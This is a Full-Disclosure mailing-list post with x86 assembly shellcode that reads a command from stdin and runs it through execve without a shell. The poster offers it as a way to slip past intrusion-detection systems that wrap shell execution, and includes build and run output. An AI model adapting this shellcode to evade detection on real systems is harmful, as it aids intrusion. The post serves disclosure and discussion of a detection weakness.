Hello Srs.! We don't need a shell. One shellcode use system calls and the shellcode can be the shell.
See the follow code: -------------- noshell.s -------------- #Exemplo de assembly que simula shell. #Sem utilizar nenhuma shell, ele � a shell.:) #Nash Leon - [EMAIL PROTECTED] # #Obs: tah pegando apenas filename com 7 bytes. _start: #read(0,buffer,20) xorl %ebx, %ebx movl $3, %eax leal -20(%esp),%ecx movl $20, %edx int $0x80 #execve(buffer) pushl %ecx popl %esi movl %esi,0x8(%esi) movb $0x0,0x7(%esi) movl $0x0,0xc(%esi) movl $0xb,%eax movl %esi,%ebx leal 0x8(%esi),%ecx #leal 0xc(%esi),%edx movl $0x0, %edx int $0x80 #exit() movl $0x1, %eax xorl %ebx, %ebx int $0x80 --------------------------------------- This source use read() and execve() to execute one command from stdin. This sample is only to demonstrate that is possible create one shellcode that execute commands without use one shell(/bin/bash,sh,zsh,tcsh, etc). It is util when one NIDS/IPS interact with one shell wrapper, waiting one string in the interface, capturing an attack. In this sample is permitted only 7 bytes as path filename to execute: $ as -o noshell.o noshell.s $ ld -o noshell noshell.s ld: warning: cannot find entry symbol _start; defaulting to 0000000008048074 $ /noshell /bin/ls noshell noshell.o noshell.s So, Mrs. One shell is not necessary to exploit one system. NIDs/IPS can use wrapper in the system call execve() to security, but still is possible break this resource. Sorry ny poor english. Best Regard, Martin Fallon. Clube dos Mercenarios http://cdm.frontthescene.com.br/ _______________________________________________________ Yahoo! Mail agora com 100MB, anti-spam e antiv�rus gr�tis! http://br.info.mail.yahoo.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
